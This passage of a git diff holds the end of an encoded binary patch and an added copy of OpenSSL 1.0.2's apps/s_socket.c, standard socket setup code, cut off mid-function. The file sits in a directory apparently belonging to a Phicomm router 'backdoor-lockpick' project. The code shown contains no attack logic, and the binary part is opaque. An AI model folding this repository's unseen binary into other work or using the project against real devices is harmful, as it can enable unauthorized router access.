zTNZ)-Ai>$sXVS;;_X2zs;QKpth6DdB;E#6j#{(b7dq+6<MZo7W<kN?@u!Wm-_~RWq
zO997uZVYtLo-+VHoANXMX$2kh=jDK7d%Om8a2|I(;5c8q6YwU;cOB?se46(eb3L{K
z{|N{G1;95$JiHA!-Z!!p@Cfj;=(&B~xK40gWmmu-1O5oW(f&z-v;FA*An?)8M>+WA
z4*nv*aos5nI&GA<so%4Kk9J-I{MEq!6Yw#v)&U>O^(f%0K<8zL&L<B1JJ3P>K6{WT
zZCo$tH}igI#&KP1Fz|8xWN*Q_Ue2M9@y`gr&jmaHI_S5_faAJc3E&t%Wq@P+949#2
za~|Zo1o)V56X3X>d@A7og!nuQ^b?@p4t&(V3~;<oag#&mPT-@?8o+VA`Z3U11ok`)
zeAIaj@W-KC9{~PWz&`{1^FjYx;A8x32Yx&7caZmO+wqnUIG)!k1m}9>F}R7V6M&ET
zE(U%F@NWkkb^hkic@X#)g3eQbqs~hXop*qL5$JRS|6kzet-we9?ZC(K=IlwLw6T9K
zrjPN@u7b0lvEKIs{w2U44*Vy;o{7LmdyW7;+7kx;rJ#Q_@X?-Q0mt!J4d`$g%($)*
za2(ey2mCU~_e{{od{+aX^?7W^+n)fxoW2`>{uOkd1phn&{NDioX$Su`;Qto*?>YFN
z0w2d|-vW;H(gQkJFL`|P0c~8?r@;P00mt*v6u@!3JyURwH`a>LhqpO^UqRoE-{yl3
z`o9kFr@@|60mu2^MS!C{e-PZZ=VriHfIats4%+h%z;QiiGvLpFoo@h+>odFT&EDv}
zuDg%m>@!@SDFFN-&>s&t&byBQ{9)ji0FL~V0mt=?vjjJO;~3)Y9N?b?`d3<fv%Yb?
z;P(2)ouGs38=aPpiJwP-kK^GF0bdRFd=5CSZ)^t~*B^F}0YCd6*B|x<9OG>`;JE%U
zN^s*hv;Hsz__+R13^=Y2%o5yQf0ze+Tz@!DaFeg`+alnjegojR{t&fv7N}bHyp@96
z>kq3z2iG4iuypE0=SmAVcHROySikoHj{biPaBT0-gFg2EuK|7~*<$*iw?PN{!w-Rv
zIv)cc&qv!F{2susf_!u2_b9l&t_FN(!8s1G{}~K?v}YgS<NXh#0LOKbBLPRhm4ZI!
zZO*3)0LOe!03Gy0E$~^#)Nd2ur$Kp70Ua#wD!_4_q#bn7o=X8=4*FMt4(fLTpY5DW
zAKqRDK8`a#2K-s*XT1G%I@ZAR<1T<>+ztmE{XYS4T>mKn9M3!Dfa7^5F1YCj_!=8;
zD}nzU*na`=(VymbPFUv}`k3}|HRzx}{|Gwl3zM(;T@+)FiK~ZzkNG|h__dJlvyOaU
z0Y2({2z>Pa*ML6{e&_)mwx2(|_1|Cr<?k;5e-Pj=0=|dfro2XH6!2dH{v?a9bEE6y
z7H<4D8*nUd1>iV;KVERQ1M6!M@KL83_~^IgfWHj(p9wmghbix0EZo@tHw!oY!#co!
zM>;0nHVSUr{{-;)n9+F;@ZW>Z7SO?Vx)u1SGr&iQX=4oe!+nhE@f-U2P@jT(@n-@4
z3i$09!A+c0=;Yoa3peGe1N;xfHU4Q9-1g5Z;A6Q~10TzEfrEb~;8@<@Idt9v{8cFL
z2cX0DjH3^4Lk`e?8G8-*C4ip<cm?3E16~dI8-U*k_*;PADY)_fKy8NiGVtF9{#OqE
z55UL%x!-}Qav?s@fgcJu&KDL6-k0RqN5;+s@X^kzfRF9^I>4_Z9TPu)0Uhig)&l+x
z_~8lALH*|e|0C$X20Ez!IpA2{JrAP9wDqMAw+UnCSi#u`I6s;WIM#0%@OQ!f69Gql
zE#U6~f0^L6J!b+R?YR_i%=aqL!Fs$7aP;RbfL{-OxC3z1xnFR`(9cf-j(&a@ba0)g
z3;4Ls(*yYX;GY5clp$@LFV52o0RK1eLxQtEZ=jE<-?_j?`x^lN0Cdg*oqnX#N*~@X
z0{lk$ZuEaEICD||cfjXkZS>*oCczo|5c2I9rVgv}b^-n;!MR+VMv{B?S-4CGyazz%
zBhc9Z{F_L}*#9`-94E==N&wFyej$B$djs$z=sVlQ+xvjuOy7<EM}RYTGm~li#=>va
zu;&feJEpwX3BHqs^IVI!-7UORp`Leuh2JOmD8Si%W9L}F+0MI!Kh?rl2_CZW%LOmD
za9$hb?L-UbYXiJ3v2dPa@YZ7C%^LPjxA2n$KgYtkkK^rP3op~KceRCw1i#V3Ckp;o
zz`G%??h~AS_A%fO0w4RIjSl<?(D?*(J_P(zz;_&>4dZ-21AHF`K3Q;%tIvtQO`e}B
z2As7_J<hRkQ;#c0>U>$}7W$a@NeIpwxK4XH@NWhFwGRGcfPVqydI5C)1Uhd3AM?#V
zm`Jp-Jzs*3PjI&X&-5|&j{*EIfKLD&)DHrm^Vm!u-s*t=73AAw@y)n>8Q`~3dSlN@
zz`4E*ej(tu1OK;z+y1`}_-N;5;G>;ST6|;Y3xK0N?*o1Z*wYO-#{ZXsvn_bO*be+V
zL1zbE7^BTD*JQ!D9`B-$@y~PzzaIG5Z!ZV@ub{Kap>rqj?*{%F2Y(~*?*aak4*oXa
zbD2lchqr!*>c3pxd+B4!J5X@jKjQ%Z8seu2bp8f9vw)9r9tS?>v4K9kodx*c>ASHf
z;n4Xj;Al@L=&S*q&A>-{egHn7(@efu;wak>1%k8R_}Du7@HPqX`{}#U2|9G*z+Vge
zl@9(*fMa>@1D$_>PABlOydMFd?Z1sayln-X%Vg}|?$8-tppq#cpgofWXa76^Iziy0
zJ#pZ#2mVS2{}$l0{WsEww|fA8kiHxH|KZU2H}F~KS{9-03&1<+yV3d1p_4P3Q|Woo
zL-g112MNyFSl(jbKMee^gWn4LM}Xh%;6Duf4Z#1WgZ~Qf9|it94*uuB-w6C|4!&;;
zk!WK-V4RE<oZ|%h^J?IK1N}_Y!EXotR^VUb;NJuMZ-M^`@Hdf7rXJr1KGx%>z~4qX
zX8f}qa6X3{ogE743vG5h3=y3D@ECmze_scG6!8BEe0t%y+HC!kf&V!0S2+0h1OH#Z
zf5^e_<JbAJ{Z9bDzu>k#y8)k%nepL4fIkU3hdOlVo#<-gd{O5}3%^*?yt#lsMVRsP
z0*8JT@L4}BIwu4EH0Z2w=(GYKbuI(^8PK`Lp>q@PS?47B@b)*rpQZ1nTn{*OHUXb?
zPGAw*UIP3%`fhaIa_DpcpLG_p2yNd1{ycp*I(-7_aIg5^NpMq-MrR1%JYV+d<lZpA
zUm(or7dZ5%0w3+H1wM{f8-dUH4wZaQ1^h+G_iWI?{^2s<W4?C+&iaEz|7p-!4E@qu
zz{h^_1HfMbd%8gf$HU(O|7GC!03Yq|KUN!N>ZL;L+!OFuK<5C#xvZ!Y2L7wSKNk47
zesvP?S*xBtywwB#8htnQ9s?cB_YB~(&O{cW?Lxp`r|(ARw+@|~fd2;YZ+Gz50H5D0
zV$KVj0Dlv7o^t5C0(`c=j6S?|0sa<!H}-$w(D?!QsFOWT$t9m33F)t19^l`B{rdy{
zHsm`(aMniu(+^9ijpOGX`WQQ>I{34J|1R+7JNPxge-HTe4*qGte;@d*4*sRU|2Ocj
zcJOZmKKo)heR#VU@DJ#_@xwZY&PL#)&WnJ52s&>%bhZE=b+!S%1$4ae^o2I&Vm<Z;
z{Cnt^b`_lKw~IceTzdf@bq)gj2hgEkK~Wp)d;~gEfR8#Qfd2?Ob3msXbdCW&>Qn;$
zAJC}<osU7M8ThDk1Mt~*;$H7gz&`<<H4dGxf&VG+e{}Gt97ZJC*l(ZF$N0ZkaJwEW
zf&V%1mpJ%W10UCQZwCAe(7D5*^A7OYrhDnb+b4j3N#BkA-#B#Ww|dmZ<^2lylLfcS
zdn)k12L9O&{@;MlT7&7s+e3hVL*I>^k2!RH1U~B&vj}ZDasp!ex6;Sx3=-V7KL|LE
zPiBG+j~_<Shqqq={w;ks`Vqi!{7?`2I8OKu@a@npwgcV+`0kTb_9_lh{~*D+Tzt^j
zL%*`5Hul3d`WSpF;HXmq_;<h$3(opz|2*KM&T)X(flie}rxy6Aa|+<!gU)FVowI?D
zItjpk0G*2+I#&Q6b$$={kDzmtL+3W&qs~2m{|9u|I&>ZaKI&`+d^_ko<<NN%_^9&+
z;60%8zC))Q_^9(G;2y;7cMctIGG#^^$0zFS2zVdR$rap=!y&*&oqYiB3pximbPfSN
z>i7Y_iEK6PXfohgpns%8e+KYTe>UL#K&Qf?b3E`-XA$7ppi}42X$C&(ECYN8&^g1Q
zvl{rQa{=Hxg3e_QovVS5IyV5G13I@lbnXN`>iiw>{-E=KLuUi<QRi{M2Y}AA4xLwk
zk2-Gyz7yzt=+OBT_^9&@;259V0UrqZS%-70)8kL<&j$!@x5r%o-x+j<I&}62KH51P
z@LbR-aOjK!KI$9}cpm6Xcj%M?A9czA9|SrJ96G-OKI%jO-vxB)9Xe6qqt2;-?+Q9+
zIdskgKI&Wq_->%{TZhi?fR8#i0zMdY{^HQN8~CVmKj1?^r_-Uc3HYe<B;dP)&I=Bm
z*MW~Z?*YCC=zQeR`2zT;^F820L8r%|v%?hK?(FupGvIrI&S1gq^WEOSM|%zgd@s;B
z*r8JheAJl$_}-v1)uB@YeAEd8z7OckbLbogeAKA|d|%M1b?7t!A9YRvd_T}x>CkBd
zKI*gszCY+(>d?6g_^5Lo;6Bi~#i4Tt@KNV)fFA%l>l`|d03UV!3HX7a^Nd61W#FUE
zTYw(~Iv+T6J^?=Jd<}R$==|W&>C2O6+U)k#AMjzIGe~f|eeD5!v}ZrShl9>Aht4SA
zqs~~sM}W>`hfWaqsB;wHBSB}bL+2Raqt1zd9}GG*4xOdIN1YbH4*{JO4xLrNN1by4
zKNNH>bm;sB_^5L&;G;n228Yg{fsZ<W1-t-s?sMoo2z=Dp2>58wdBUOdJn&KHHNeM!
z&btnsF5sii=YSW2&bJPo?Z8K!?5U}C=LemEg4^wDH{herUVsNc=KzP!NZ_N+7{JGZ
z&S4InBY=-O#ek0kommc@a^R!Rv4D>Uos%3oOMs6$jes8pI&p{2>A**wR=_8K&iM|V
zOMs6$R|7r~bpGJbxf%GVb35RZK<8eE&Od;UI!^*V8FZd==)4Mi)OiQ+!$D_@L+3N#
zqs~^qr-06X96J4uOtmA_*$MC?KxbFM?e?`N@KMJH_|24+S;sgSa9qb2?a&_&eAJ%;
z_*Ag7$f0u-@KNVzz|qd*0LS@kr9*!)@KL`3@FT&_m_z3@;G@pjfKLORghS_I;G@nJ
zfCoY6_YR$#fR8%20X`jc?s4d>1wQIL1b7kXY<B281$@+b5%6NrdBdUeKJZbe8}Jg)
z`O=~D9q>`7@3d6=ngKdH3U0TfT;QY55Wr`G&OQ#EgMg1ZhX5V|9lt|oBJfe?NWe=$
zXNE&(Ht>%Eeg)vDf4oCy3Gmr>kI;v=lc%XaY8=i(20q5y@@eXi!WrA3zj|j{_&tIr
z0B0T3UtJ71>zM0YR{)Oo-zYe9`_SaT=&T3+Ebzm>07soS0Z04a6P&TWp#Kr@QKtv^
z%OKyqgCsy3&tK4QhX5W1{useI-z>;?8t^gSGT>vr4Zvrub@buw48T#R1Mt~>QvSR`
zaMtJt_B;UmIl$itIO;zGIBS{ueNS-4(9a(OA9a2JK9+aa=_J4!^uf3~0PwkeQso*h
zIOmIgJ`DJn?^NJpz83(V-8ZG*<-iXpVk>p~*#Y>4f)kW>-DCpbWnljl&{+g{5%AIe
z5b)9dg@Eq}_AGJeGy;A!<QoMYwC7adqdjK=AMH68@Eow`3c&jVem&@OUEapdrR{DD
zzd^&^It#y1@J9eIhjKj*INJXr;GD0~`B-qqFrL2#KI&u@YXg{%e%M`bjt4$w%5@;%
z7|$aFXD-I`Xy9YMhXWt;Jqq}&buE2(I~MSH;Gag&!T#Yq;A6g*1AhS2<4u6?1o&MJ
zoi%`0fIaI#2d{%X4fsINe+hKZ&Nl&{5Bgg`2lYP#en0Y8RC$fA(OdXD!TXfx9aF#6
zg7+7kHFgF&cLBT|?AgQ8Ss*(5TX;<HkruvG@BrYsknbeH*`ALf-)X?-WA&m_3OMSN
zIdm2PpLL9#5x}`WH(N8{%<q%~r&;)|f}dmI*9m?J;H+=%GrSgX*1t>me-@mvJn+w7
zE&c_<f5^he3H}`5$ACXy2OQ(@8wdU);0r(}YlhB<?Zo&TAh?M)W9RO`9|Yyv7x-w;
zD8M-nQ?9XqF9drggFf051U~B+du9QD7qI7Oi!YaByyO3$(#}0Z$|{V*1LY;myz8p%
zI$ko@%QTxC1W9fE(Q4%-LDaN#T*nr6$6aP8FNm__3Q|_4BIqV5Eo5!bVu2|nWJHUI
zcGb!>3G)vnZx!93I`5qKT^|m6{_2CB@B5y4zTY|Dd(L-Uc61H6<<ui*Df-hK@i)OA
zh<3LtmwyH}2z+-W=XK-^hTk6XPs3+F&jtQq*S>6*0&e$v6*)uDZt*`mch@;o{By+o
z9@UcO*--fXm5a}D9|E6$UX;P-IF5xs4EYa4{3`e*@T(*KeE7rRuY%A1uLoy8pGVFJ
z<h&N~kHQ}b|0I02dkTCZ=HVIS@VU4S&UNMw<VgQpWboY9d%EAdt`x`D*3W+6PodqR
z$|ZyCmcp0!?72<_e4}qJQ5|rbSBsE;C+d@f&vkDVIP3OGgzp6By0=GpcwcSs<-Hc|
ze+PW7dk5jOKS#kAp`M>2hxI%GpE+N`=X3M}eAfRWIM>ymk;8U>h0pu_2R_%;TW9!!
z*!;0|^^SmB-9{;wY_3;RBmVvHxvoB{JX}|2MsnsNhwJJy5&s4F>}PAl-wU7XVLN<|
zV+VYW<01I0{}K3H4^Kt>Gw`_{{uuFZz~_26;IW(I%l?;uv!A8Pg>gNc7WnqO&w*cx
z=e+=*KlgYET-vbpY6tjYJYTKI=R9wN&zyGfr;&3Yl5-He4E_HCIk&iePV;3<oQ6LN
z{!f9gf8956CF1vZ+y~loXLT5)T<&Qz`adr4t^VckInUF9Z|n9W;QTqs0&v!I2{^}P
zg>rE@E;;zjSqGo@wGljtdTtAHTD1QA;PZap0%y*#Ajj%<68>nkdoJ)NYrB^MZaG(x
zGX^<-!RK@LFMO^WeV*_Q*?h43O)HmLvY)d8-}<vK;^!m&2KZyq|4o5!{n;7u_b8v}
z`Z*3cZv;8VwVrPWe2ek}%H@9VLe8Ox{|UG}r)kYOhMe)p`CPg5^KS5OkRxqx(VVl$
znE?Mn#J{Xu^2_00L(W9---8^hbI+N+15Pb|Uw2&lGgNt4pVGj$oN{p1Cxsl==RWw-
zhOJ8v2i)@KA*TiF)ryE;2cOSxKJd5b{ceQM{2dX07kuWogHJ;J4@7bf!=DWQqrkUy
z^#pw8e;xQ%x3ln>e<AR#{+Gemy4u+19XF7}b@)&C9LHX>d|`!g9ZoB^`L<5$KOJ1=
zPo?sC$eDurEQT*_*f`b%-0tg0z|HSOehT^Dfj3~jT~sd59e-|o1^zwA`5T-$eP{a{
zl)k6okBIPc<<c&5rov~t4@Layh`$hg4eqxt!q<aWp#Lq(9V)ITxBJ^nY=h7I)(C$y
z!rw!_%oCfRhry+$y|vxWNX|+4l4Je+HsYTTd}%|rOA-G%d~sWfw);JE@HyZ5=sz45
zm*ZOk&UrEsob{X*;WNPR#ds|Op9-D>uLLhBxAC>-YXkhxFn=}$exuf5YryN3?~df`
z3;bI3KZL&??aJ>ElTGT$^{Q!f5f}M6_@4ToU&+1A?tjyhBVqD&Sh>wF<88`q9vR=S
zTz6eLwHh#3!rf;6F%?TZ?&8-iK)KvrPxtk%=2(A>w<$=fZ~1!KwZ0l3sBbI{{NE(d
zZT7jY`7ieHyhPtOzH5Nz%LD$)2+unLo-OnI`+#pA<+*$>B%9@bkSv}imIu6YwCBwM
zU#+||;17=RzWritdAs;E*7LM13T`ugR{4T}4<F~ftpR^uc_P)cHdn|jbNfQx?`!QS
zpRLcN3fVP<L~41akV&MLH8mwt`35-=y&_fNPDS!ePl|6loT_iA$<!xOH4V93cBKnh
z*-*%)s%Ooc(p1RQ)am)NE1yd><{KKb`NCQa$kr}dk<a9^zUTk%HR&#wp_94Dtx8W$
z%^~$J$w+r1&uA5)JKp@U2hFegeLuI8c5I&8^D$nzmfy?nHTk4JZ0;idAQ_xbcIT2A
zUcXnb|0?jUeZv**K>DS>p2Kj$t{<=S&)yJMHrva`D{?IJj9X{kpG_ci$6@<bj&)bR
z-tu9h+x8b<-DgQ|FJolaTm9xbCT4j5*R=g$+3C98T~gfS+rRGG@6h(s>Ph?3cG&(h
z$E1Dp+@as}gUv~Hu6uu1H|tmDxG}1e?1NFlZe02PvzPk{>z~%^lkPok)_-H$-GQ_p
zUO&gKm*QXxuYcLS*IoV2YyFz_=A?do-IrZ&<JVo=(p=+ed3B#RR{Fh+;}R!_*Wc!N
nIQDWy?K|?CNR$opdwbRH*lA*bJL>NGrSrYHr_1yQ;r0Iks18cI

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.c
new file mode 100644
index 0000000..77a7688
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.c
@@ -0,0 +1,613 @@
+/*
+ * apps/s_socket.c - socket-related functions used by s_client and s_server
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#include <signal.h>
+
+#ifdef FLAT_INC
+# include "e_os2.h"
+#else
+# include "../e_os2.h"
+#endif
+
+/*
+ * With IPv6, it looks like Digital has mixed up the proper order of
+ * recursive header file inclusion, resulting in the compiler complaining
+ * that u_int isn't defined, but only if _POSIX_C_SOURCE is defined, which is
+ * needed to have fileno() declared correctly...  So let's define u_int
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__U_INT)
+# define __U_INT
+typedef unsigned int u_int;
+#endif
+
+#define USE_SOCKETS
+#define NON_MAIN
+#include "apps.h"
+#undef USE_SOCKETS
+#undef NON_MAIN
+#include "s_apps.h"
+#include <openssl/ssl.h>
+
+#ifdef FLAT_INC
+# include "e_os.h"
+#else
+# include "../e_os.h"
+#endif
+
+#ifndef OPENSSL_NO_SOCK
+
+# if defined(OPENSSL_SYS_NETWARE) && defined(NETWARE_BSDSOCK)
+#  include "netdb.h"
+# endif
+
+static struct hostent *GetHostByName(char *name);
+# if defined(OPENSSL_SYS_WINDOWS) || (defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK))
+static void ssl_sock_cleanup(void);
+# endif
+static int ssl_sock_init(void);
+static int init_client_ip(int *sock, unsigned char ip[4], int port, int type);
+static int init_server(int *sock, int port, int type);
+static int init_server_long(int *sock, int port, char *ip, int type);
+static int do_accept(int acc_sock, int *sock, char **host);
+static int host_ip(char *str, unsigned char ip[4]);
+
+# ifdef OPENSSL_SYS_WIN16
+#  define SOCKET_PROTOCOL 0     /* more microsoft stupidity */
+# else
+#  define SOCKET_PROTOCOL IPPROTO_TCP
+# endif
+
+# if defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK)
+static int wsa_init_done = 0;
+# endif
+
+# ifdef OPENSSL_SYS_WINDOWS
+static struct WSAData wsa_state;
+static int wsa_init_done = 0;
+
+#  ifdef OPENSSL_SYS_WIN16
+static HWND topWnd = 0;
+static FARPROC lpTopWndProc = NULL;
+static FARPROC lpTopHookProc = NULL;
+extern HINSTANCE _hInstance;    /* nice global CRT provides */
+
+static LONG FAR PASCAL topHookProc(HWND hwnd, UINT message, WPARAM wParam,
+                                   LPARAM lParam)
+{
+    if (hwnd == topWnd) {
+        switch (message) {
+        case WM_DESTROY:
+        case WM_CLOSE:
+            SetWindowLong(topWnd, GWL_WNDPROC, (LONG) lpTopWndProc);
+            ssl_sock_cleanup();
+            break;
+        }
+    }
+    return CallWindowProc(lpTopWndProc, hwnd, message, wParam, lParam);
+}
+
+static BOOL CALLBACK enumproc(HWND hwnd, LPARAM lParam)
+{
+    topWnd = hwnd;
+    return (FALSE);
+}
+
+#  endif                        /* OPENSSL_SYS_WIN32 */
+# endif                         /* OPENSSL_SYS_WINDOWS */
+
+# ifdef OPENSSL_SYS_WINDOWS
+static void ssl_sock_cleanup(void)
+{
+    if (wsa_init_done) {
+        wsa_init_done = 0;
+#  ifndef OPENSSL_SYS_WINCE
+        WSACancelBlockingCall();
+#  endif
+        WSACleanup();
+    }
+}
+# elif defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK)
+static void sock_cleanup(void)
+{
+    if (wsa_init_done) {
+        wsa_init_done = 0;
+        WSACleanup();
+    }
+}
+# endif
+
+static int ssl_sock_init(void)
+{
+# ifdef WATT32
+    extern int _watt_do_exit;
+    _watt_do_exit = 0;
+    if (sock_init())
+        return (0);
+# elif defined(OPENSSL_SYS_WINDOWS)
+    if (!wsa_init_done) {
+        int err;
+
+#  ifdef SIGINT
+        signal(SIGINT, (void (*)(int))ssl_sock_cleanup);
+#  endif
+        wsa_init_done = 1;
+        memset(&wsa_state, 0, sizeof(wsa_state));
+        if (WSAStartup(0x0101, &wsa_state) != 0) {
+            err = WSAGetLastError();
+            BIO_printf(bio_err, "unable to start WINSOCK, error code=%d\n",
+                       err);
+            return (0);
+        }
+#  ifdef OPENSSL_SYS_WIN16
+        EnumTaskWindows(GetCurrentTask(), enumproc, 0L);
+        lpTopWndProc = (FARPROC) GetWindowLong(topWnd, GWL_WNDPROC);
+        lpTopHookProc = MakeProcInstance((FARPROC) topHookProc, _hInstance);
+
+        SetWindowLong(topWnd, GWL_WNDPROC, (LONG) lpTopHookProc);
+#  endif                        /* OPENSSL_SYS_WIN16 */
+    }
+# elif defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK)
+    WORD wVerReq;
+    WSADATA wsaData;
+    int err;
+
+    if (!wsa_init_done) {
+
+#  ifdef SIGINT
+        signal(SIGINT, (void (*)(int))sock_cleanup);
+#  endif
+
+        wsa_init_done = 1;
+        wVerReq = MAKEWORD(2, 0);
+        err = WSAStartup(wVerReq, &wsaData);
+        if (err != 0) {
+            BIO_printf(bio_err, "unable to start WINSOCK2, error code=%d\n",
+                       err);
+            return (0);
+        }
+    }
+# endif                         /* OPENSSL_SYS_WINDOWS */
+    return (1);
+}
+
+int init_client(int *sock, char *host, int port, int type)
+{
+    unsigned char ip[4];
+
+    memset(ip, '\0', sizeof ip);
+    if (!host_ip(host, &(ip[0])))
+        return 0;
+    return init_client_ip(sock, ip, port, type);
+}
+
+static int init_client_ip(int *sock, unsigned char ip[4], int port, int type)
+{
+    unsigned long addr;
+    struct sockaddr_in them;
+    int s, i;
+
+    if (!ssl_sock_init())
+        return (0);
+
+    memset((char *)&them, 0, sizeof(them));
+    them.sin_family = AF_INET;
+    them.sin_port = htons((unsigned short)port);
+    addr = (unsigned long)
+        ((unsigned long)ip[0] << 24L) |
+        ((unsigned long)ip[1] << 16L) |
+        ((unsigned long)ip[2] << 8L) | ((unsigned long)ip[3]);
+    them.sin_addr.s_addr = htonl(addr);
+
+    if (type == SOCK_STREAM)
+        s = socket(AF_INET, SOCK_STREAM, SOCKET_PROTOCOL);
+    else                        /* ( type == SOCK_DGRAM) */
+        s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+    if (s == INVALID_SOCKET) {
+        perror("socket");
+        return (0);
+    }
+# if defined(SO_KEEPALIVE) && !defined(OPENSSL_SYS_MPE)
+    if (type == SOCK_STREAM) {
+        i = 0;
+        i = setsockopt(s, SOL_SOCKET, SO_KEEPALIVE, (char *)&i, sizeof(i));
+        if (i < 0) {
+            closesocket(s);
+            perror("keepalive");
+            return (0);
+        }
+    }
+# endif
+
+    if (connect(s, (struct sockaddr *)&them, sizeof(them)) == -1) {
+        closesocket(s);
+        perror("connect");
+        return (0);
+    }
+    *sock = s;
+    return (1);
+}
+
+int do_server(int port, int type, int *ret,
+              int (*cb) (char *hostname, int s, int stype,
+                         unsigned char *context), unsigned char *context,
+              int naccept)
+{
+    int sock;
+    char *name = NULL;
+    int accept_socket = 0;
+    int i;
+
+    if (!init_server(&accept_socket, port, type))
+        return (0);
+
+    if (ret != NULL) {
+        *ret = accept_socket;
+        /* return(1); */
+    }
+    for (;;) {
+        if (type == SOCK_STREAM) {
+            if (do_accept(accept_socket, &sock, &name) == 0) {
+                SHUTDOWN(accept_socket);
+                return (0);
+            }
+        } else
+            sock = accept_socket;
+        i = (*cb) (name, sock, type, context);
+        if (name != NULL)
+            OPENSSL_free(name);
+        if (type == SOCK_STREAM)
+            SHUTDOWN2(sock);
+        if (naccept != -1)
+            naccept--;
+        if (i < 0 || naccept == 0) {
+            SHUTDOWN2(accept_socket);
+            return (i);
+        }
+    }
+}
+
+static int init_server_long(int *sock, int port, char *ip, int type)
+{
+    int ret = 0;
+    struct sockaddr_in server;
+    int s = -1;
+
+    if (!ssl_sock_init())
+        return (0);
+
+    memset((char *)&server, 0, sizeof(server));
+    server.sin_family = AF_INET;
+    server.sin_port = htons((unsigned short)port);
+    if (ip == NULL)
+        server.sin_addr.s_addr = INADDR_ANY;
+    else
+/* Added for T3E, address-of fails on bit field (beckman@acl.lanl.gov) */
+# ifndef BIT_FIELD_LIMITS
+        memcpy(&server.sin_addr.s_addr, ip, 4);
+# else
+        memcpy(&server.sin_addr, ip, 4);
+# endif
+
+    if (type == SOCK_STREAM)
+        s = socket(AF_INET, SOCK_STREAM, SOCKET_PROTOCOL);
+    else                        /* type == SOCK_DGRAM */
+        s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+
+    if (s == INVALID_SOCKET)
+        goto err;
+# if defined SOL_SOCKET && defined SO_REUSEADDR
+    {
+        int j = 1;
+        setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (void *)&j, sizeof j);
+    }
+# endif
+    if (bind(s, (struct sockaddr *)&server, sizeof(server)) == -1) {
+# ifndef OPENSSL_SYS_WINDOWS
+        perror("bind");
+# endif
+        goto err;
+    }
+    /* Make it 128 for linux */
+    if (type == SOCK_STREAM && listen(s, 128) == -1)
+        goto err;
+    *sock = s;
+    ret = 1;
+ err:
+    if ((ret == 0) && (s != -1)) {
+        SHUTDOWN(s);
+    }
+    return (ret);
+}
+
+static int init_server(int *sock, int port, int type)
+{
+    return (init_server_long(sock, port, NULL, type));
+}
+
+static int do_accept(int acc_sock, int *sock, char **host)
+{
+    int ret;
+    struct hostent *h1, *h2;
+    static struct sockaddr_in from;
+    int len;
+/*      struct linger ling; */
+
+    if (!ssl_sock_init())
+        return (0);
+
+# ifndef OPENSSL_SYS_WINDOWS
+ redoit:
+# endif
+
+    memset((char *)&from, 0, sizeof(from));
+    len = sizeof(from);
+    /*
+     * Note: under VMS with SOCKETSHR the fourth parameter is currently of
+     * type (int *) whereas under other systems it is (void *) if you don't
+     * have a cast it will choke the compiler: if you do have a cast then you
+     * can either go for (int *) or (void *).
+     */
+    ret = accept(acc_sock, (struct sockaddr *)&from, (void *)&len);
+    if (ret == INVALID_SOCKET) {
+# if defined(OPENSSL_SYS_WINDOWS) || (defined(OPENSSL_SYS_NETWARE) && !defined(NETWARE_BSDSOCK))
+        int i;
